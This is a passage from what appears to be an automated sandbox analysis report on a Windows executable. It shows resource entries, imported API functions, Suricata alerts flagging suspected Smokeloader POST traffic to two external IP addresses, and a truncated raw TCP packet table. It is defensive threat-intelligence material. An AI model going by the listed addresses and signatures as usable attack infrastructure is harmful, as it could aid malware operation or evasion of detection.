RT_STRING	0x2744618	0x76c	data			0.42526315789473684
RT_STRING	0x2744d88	0x606	data			0.4455252918287938
RT_STRING	0x2745390	0x7c2	data			0.42245720040281975
RT_STRING	0x2745b58	0x810	data			0.42102713178294576
RT_STRING	0x2746368	0x584	data			0.4461756373937677
RT_STRING	0x27468f0	0x74c	data			0.4234475374732334
RT_STRING	0x2747040	0x710	data			0.4303097345132743
RT_STRING	0x2747750	0x5f6	data			0.4325032765399738
RT_STRING	0x2747d48	0x88	data			0.625
RT_GROUP_CURSOR	0x273fd50	0x22	data			1.0588235294117647
RT_GROUP_CURSOR	0x2742450	0x22	data			1.088235294117647
RT_GROUP_ICON	0x2732b48	0x76	data	Turkish	Turkey	0.6694915254237288
RT_GROUP_ICON	0x273d600	0x76	data	Turkish	Turkey	0.6694915254237288
RT_GROUP_ICON	0x272c310	0x76	data	Turkish	Turkey	0.6610169491525424
RT_GROUP_ICON	0x2736dd8	0x68	data	Turkish	Turkey	0.7211538461538461
RT_VERSION	0x2742478	0x1b4	data			0.5756880733944955

Imports

DLL	Import
KERNEL32.dll	OpenJobObjectA, ReadConsoleA, InterlockedDecrement, GlobalSize, SetDefaultCommConfigW, QueryDosDeviceA, GetComputerNameW, SetEvent, GetNumaAvailableMemoryNode, FreeEnvironmentStringsA, GetModuleHandleW, GetConsoleAliasesLengthA, SetCommState, GetConsoleWindow, ReadConsoleOutputW, GetVersionExW, GetStringTypeExW, HeapDestroy, GetFileAttributesA, DeleteVolumeMountPointA, DisconnectNamedPipe, LCMapStringA, GetLastError, GetProcAddress, MoveFileW, SetStdHandle, LoadLibraryA, InterlockedExchangeAdd, LocalAlloc, WritePrivateProfileStringA, GetModuleFileNameA, BuildCommDCBA, FatalAppExitA, GetShortPathNameW, SetCalendarInfoA, FindAtomW, SearchPathW, GetNumaProcessorNode, GetConsoleFontSize, PulseEvent, HeapAlloc, MultiByteToWideChar, Sleep, ExitProcess, GetCommandLineA, GetStartupInfoA, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapFree, VirtualFree, VirtualAlloc, HeapReAlloc, HeapCreate, WriteFile, GetStdHandle, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, InitializeCriticalSectionAndSpinCount, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, SetHandleCount, GetFileType, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, RtlUnwind, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, SetFilePointer, GetConsoleCP, GetConsoleMode, FlushFileBuffers, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, CloseHandle, CreateFileA
GDI32.dll	GetBoundsRect
ADVAPI32.dll	ClearEventLogW

Possible Origin

Language of compilation system	Country where language is spoken	Map
Turkish	Turkey

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-14T01:52:27.352704+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49736	189.161.95.103	80	TCP
2024-10-14T01:52:28.476787+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49737	189.161.95.103	80	TCP
2024-10-14T01:52:29.578063+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49738	189.161.95.103	80	TCP
2024-10-14T01:52:30.712318+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49739	189.161.95.103	80	TCP
2024-10-14T01:52:31.846797+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49740	189.161.95.103	80	TCP
2024-10-14T01:52:32.943368+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49741	189.161.95.103	80	TCP
2024-10-14T01:52:34.066205+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49742	189.161.95.103	80	TCP
2024-10-14T01:52:35.284563+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49743	189.161.95.103	80	TCP
2024-10-14T01:52:36.394921+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49744	189.161.95.103	80	TCP
2024-10-14T01:52:37.513650+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49745	189.161.95.103	80	TCP
2024-10-14T01:52:38.616273+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49746	189.161.95.103	80	TCP
2024-10-14T01:52:39.978543+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49747	189.161.95.103	80	TCP
2024-10-14T01:52:41.229308+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49748	189.161.95.103	80	TCP
2024-10-14T01:52:42.343624+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49749	189.161.95.103	80	TCP
2024-10-14T01:52:43.461849+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49750	189.161.95.103	80	TCP
2024-10-14T01:52:44.586287+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49751	189.161.95.103	80	TCP
2024-10-14T01:52:45.701213+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49752	189.161.95.103	80	TCP
2024-10-14T01:52:46.817207+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49753	189.161.95.103	80	TCP
2024-10-14T01:52:47.922152+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49754	189.161.95.103	80	TCP
2024-10-14T01:52:49.045985+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49755	189.161.95.103	80	TCP
2024-10-14T01:52:50.193029+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49756	189.161.95.103	80	TCP
2024-10-14T01:52:51.533325+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49757	189.161.95.103	80	TCP
2024-10-14T01:52:52.671964+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49758	189.161.95.103	80	TCP
2024-10-14T01:52:53.788983+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49759	189.161.95.103	80	TCP
2024-10-14T01:52:54.895988+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49760	189.161.95.103	80	TCP
2024-10-14T01:52:56.000150+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49761	189.161.95.103	80	TCP
2024-10-14T01:52:57.098914+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49762	189.161.95.103	80	TCP
2024-10-14T01:52:58.208548+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49763	189.161.95.103	80	TCP
2024-10-14T01:52:59.308215+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49766	189.161.95.103	80	TCP
2024-10-14T01:53:00.410405+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49772	189.161.95.103	80	TCP
2024-10-14T01:53:01.541617+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49783	189.161.95.103	80	TCP
2024-10-14T01:53:02.669552+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49789	189.161.95.103	80	TCP
2024-10-14T01:53:03.768388+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49797	189.161.95.103	80	TCP
2024-10-14T01:53:04.909931+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49806	189.161.95.103	80	TCP
2024-10-14T01:53:06.098599+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49812	189.161.95.103	80	TCP
2024-10-14T01:54:18.022227+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50037	58.151.148.90	80	TCP
2024-10-14T01:54:25.117522+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50038	58.151.148.90	80	TCP
2024-10-14T01:54:31.240510+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50039	58.151.148.90	80	TCP
2024-10-14T01:54:37.062971+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50040	58.151.148.90	80	TCP
2024-10-14T01:54:43.976866+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50041	58.151.148.90	80	TCP
2024-10-14T01:54:50.199292+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50042	58.151.148.90	80	TCP
2024-10-14T01:54:56.990013+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50043	58.151.148.90	80	TCP
2024-10-14T01:55:03.109844+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50044	58.151.148.90	80	TCP
2024-10-14T01:55:09.950050+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50045	58.151.148.90	80	TCP
2024-10-14T01:55:17.944120+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50046	58.151.148.90	80	TCP
2024-10-14T01:55:24.265967+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50047	58.151.148.90	80	TCP
2024-10-14T01:55:30.261756+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50048	58.151.148.90	80	TCP
2024-10-14T01:55:37.612387+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50049	58.151.148.90	80	TCP
2024-10-14T01:55:44.030057+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50050	58.151.148.90	80	TCP
2024-10-14T01:55:51.158024+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50051	58.151.148.90	80	TCP
2024-10-14T01:55:56.961550+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50052	58.151.148.90	80	TCP
2024-10-14T01:56:03.563735+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50053	58.151.148.90	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 14, 2024 01:52:26.250921965 CEST	49736	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:26.256372929 CEST	80	49736	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:26.256572008 CEST	49736	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:26.256912947 CEST	49736	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:26.256913900 CEST	49736	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:26.261977911 CEST	80	49736	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:26.262103081 CEST	80	49736	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:27.352427959 CEST	80	49736	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:27.352530003 CEST	80	49736	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:27.352704048 CEST	49736	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:27.354927063 CEST	49736	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:27.359307051 CEST	49737	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:27.360255003 CEST	80	49736	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:27.364826918 CEST	80	49737	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:27.364927053 CEST	49737	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:27.365040064 CEST	49737	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:27.365065098 CEST	49737	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:27.370734930 CEST	80	49737	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:27.370774984 CEST	80	49737	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:28.476666927 CEST	80	49737	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:28.476717949 CEST	80	49737	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:28.476787090 CEST	49737	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:28.477004051 CEST	49737	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:28.480262995 CEST	49738	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:28.482255936 CEST	80	49737	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:28.485543013 CEST	80	49738	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:28.485601902 CEST	49738	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:28.485728979 CEST	49738	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:28.485752106 CEST	49738	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:28.490801096 CEST	80	49738	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:28.490998030 CEST	80	49738	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:29.577939987 CEST	80	49738	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:29.577999115 CEST	80	49738	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:29.578063011 CEST	49738	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:29.578174114 CEST	49738	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:29.580718994 CEST	49739	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:29.583134890 CEST	80	49738	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:29.586182117 CEST	80	49739	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:29.586394072 CEST	49739	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:29.586394072 CEST	49739	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:29.586394072 CEST	49739	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:29.591716051 CEST	80	49739	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:29.591753006 CEST	80	49739	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:30.712194920 CEST	80	49739	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:30.712241888 CEST	80	49739	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:30.712317944 CEST	49739	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:30.712481022 CEST	49739	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:30.717324018 CEST	80	49739	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:30.735101938 CEST	49740	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:30.740581036 CEST	80	49740	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:30.742223024 CEST	49740	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:30.745536089 CEST	49740	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:30.746463060 CEST	49740	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:30.750751019 CEST	80	49740	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:30.751739025 CEST	80	49740	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:31.838764906 CEST	80	49740	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:31.845276117 CEST	80	49740	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:31.846796989 CEST	49740	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:31.846844912 CEST	49740	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:31.849359989 CEST	49741	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:31.851830006 CEST	80	49740	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:31.854748011 CEST	80	49741	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:31.855186939 CEST	49741	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:31.855186939 CEST	49741	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:31.855186939 CEST	49741	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:31.860682964 CEST	80	49741	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:31.860724926 CEST	80	49741	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:32.943216085 CEST	80	49741	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:32.943268061 CEST	80	49741	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:32.943367958 CEST	49741	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:32.943514109 CEST	49741	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:32.948695898 CEST	80	49741	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:32.949100971 CEST	49742	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:32.954121113 CEST	80	49742	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:32.954205036 CEST	49742	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:32.954488039 CEST	49742	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:32.954519987 CEST	49742	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:32.959379911 CEST	80	49742	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:32.959428072 CEST	80	49742	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:34.066059113 CEST	80	49742	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:34.066123009 CEST	80	49742	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:34.066205025 CEST	49742	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:34.066339016 CEST	49742	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:34.069298983 CEST	49743	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:34.072515011 CEST	80	49742	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:34.075131893 CEST	80	49743	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:34.075226068 CEST	49743	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:34.075334072 CEST	49743	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:34.075371981 CEST	49743	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:34.080177069 CEST	80	49743	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:34.080348015 CEST	80	49743	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:35.284312010 CEST	80	49743	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:35.284360886 CEST	80	49743	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:35.284392118 CEST	80	49743	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:35.284563065 CEST	49743	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:35.284563065 CEST	49743	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:35.284662962 CEST	49743	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:35.287475109 CEST	49744	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:35.289781094 CEST	80	49743	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:35.292458057 CEST	80	49744	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:35.292691946 CEST	49744	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:35.292782068 CEST	49744	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:35.292782068 CEST	49744	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:35.298104048 CEST	80	49744	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:35.298146009 CEST	80	49744	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:36.394654036 CEST	80	49744	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:36.394710064 CEST	80	49744	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:36.394921064 CEST	49744	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:36.395009041 CEST	49744	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:36.400366068 CEST	80	49744	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:36.402894020 CEST	49745	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:36.408277988 CEST	80	49745	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:36.408365011 CEST	49745	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:36.408469915 CEST	49745	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:36.408479929 CEST	49745	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:36.413924932 CEST	80	49745	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:36.414494038 CEST	80	49745	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:37.513359070 CEST	80	49745	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:37.513529062 CEST	80	49745	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:37.513649940 CEST	49745	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:37.513694048 CEST	49745	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:37.517194986 CEST	49746	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:37.519069910 CEST	80	49745	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:37.522562981 CEST	80	49746	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:37.522651911 CEST	49746	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:37.522823095 CEST	49746	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:37.522850037 CEST	49746	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:37.528199911 CEST	80	49746	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:37.528238058 CEST	80	49746	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:38.610548973 CEST	80	49746	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:38.616184950 CEST	80	49746	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:38.616272926 CEST	49746	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:38.616314888 CEST	49746	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:38.619465113 CEST	49747	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:38.621345043 CEST	80	49746	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:38.624767065 CEST	80	49747	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:38.624936104 CEST	49747	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:38.624982119 CEST	49747	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:38.624982119 CEST	49747	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:38.630229950 CEST	80	49747	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:38.630297899 CEST	80	49747	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:39.978420019 CEST	80	49747	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:39.978463888 CEST	80	49747	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:39.978492022 CEST	80	49747	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:39.978519917 CEST	80	49747	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:39.978543043 CEST	49747	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:39.978543997 CEST	49747	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:39.978631973 CEST	49747	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:39.982259989 CEST	49747	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:39.987247944 CEST	80	49747	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:40.118221998 CEST	49748	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:40.123629093 CEST	80	49748	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:40.123738050 CEST	49748	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:40.123960972 CEST	49748	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:40.124027014 CEST	49748	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:40.129326105 CEST	80	49748	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:40.129368067 CEST	80	49748	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:41.223464966 CEST	80	49748	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:41.229232073 CEST	80	49748	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:41.229307890 CEST	49748	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:41.229357004 CEST	49748	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:41.232445955 CEST	49749	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:41.234304905 CEST	80	49748	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:41.237320900 CEST	80	49749	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:41.237412930 CEST	49749	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:41.237576008 CEST	49749	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:41.237576008 CEST	49749	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:41.242463112 CEST	80	49749	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:41.242522001 CEST	80	49749	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:42.343538046 CEST	80	49749	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:42.343560934 CEST	80	49749	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:42.343624115 CEST	49749	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:42.343811989 CEST	49749	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:42.347002029 CEST	49750	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:42.348752022 CEST	80	49749	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:42.352205992 CEST	80	49750	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:42.352401018 CEST	49750	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:42.352502108 CEST	49750	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:42.352502108 CEST	49750	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:42.357500076 CEST	80	49750	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:42.357518911 CEST	80	49750	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:43.461736917 CEST	80	49750	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:43.461760044 CEST	80	49750	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:43.461848974 CEST	49750	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:43.468250036 CEST	49750	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:43.473495960 CEST	80	49750	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:43.482388973 CEST	49751	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:43.487654924 CEST	80	49751	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:43.487875938 CEST	49751	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:43.505342960 CEST	49751	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:43.505342960 CEST	49751	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:43.510672092 CEST	80	49751	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:43.511292934 CEST	80	49751	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:44.583055019 CEST	80	49751	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:44.586193085 CEST	80	49751	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:44.586287022 CEST	49751	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:44.586338043 CEST	49751	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:44.589433908 CEST	49752	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:44.591711044 CEST	80	49751	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:44.594584942 CEST	80	49752	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:44.594676018 CEST	49752	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:44.594820976 CEST	49752	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:44.594852924 CEST	49752	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:44.600387096 CEST	80	49752	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:44.600425005 CEST	80	49752	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:45.700979948 CEST	80	49752	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:45.701046944 CEST	80	49752	189.161.95.103	192.168.2.4
Oct 14, 2024 01:52:45.701212883 CEST	49752	80	192.168.2.4	189.161.95.103
Oct 14, 2024 01:52:45.701253891 CEST	49752	80	192.168.2.4	189.161.95.103
